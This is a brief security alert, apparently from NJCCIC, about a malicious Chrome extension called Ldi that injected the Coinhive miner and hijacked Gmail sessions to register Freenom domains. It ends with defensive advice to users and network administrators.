Malicious Chrome Extension Injects Coinhive Miner and Uses Victim’s Gmail Account to Register Domain Names

Bleeping Computer founder Lawrence Abrams discovered a malicious Chrome browser extension named Ldi that, when installed, connects to a remote host to receive a script designed to execute commands on the victim’s browser. It then loads the cryptocurrency miner Coinhive and uses the browser to connect to both the victim’s Facebook and Gmail accounts if the pages are already open in that instance of Chrome. Although the use of the Facebook account is currently unknown, Ldi uses the victim’s Gmail account to register multiple domain names via Freenom, a free domain registry service based in the Netherlands. Although a confirmation link sent to the victim’s Gmail account by Freenom needs to be opened to finish the registration, Ldi checks for the email and opens the link automatically. Information about the registered domains is then transmitted back to a C2 server. The extension has since been removed from the Chrome Web Store and the number of impacted victims is currently unknown. Ldi used compromised websites to promote the extension by directing visitors to its now defunct Chrome Web Store listing. The NJCCIC assesses with high confidence that profit-motivated threat actors will increasingly take advantage of open-source in-browser cryptocurrency mining scripts to generate revenue by embedding the malicious code in compromised websites, online advertisements, and in browser extensions. The NJCCIC recommends exercising caution when installing browser extensions and monitoring system CPU usage for spikes in activity after installation. Promptly remove any extension that behaves erratically or inexplicably consumes system resources. Additionally, consider installing a reputable ad-blocking and/or script-blocking extension. Network administrators may want to consider blocking inbound and outbound connections to known C2 IP addresses and domains. More information about this malicious extension, including indicators of compromise, is available on the Bleeping Computer website.

AlertNJCCICGoogle, Chrome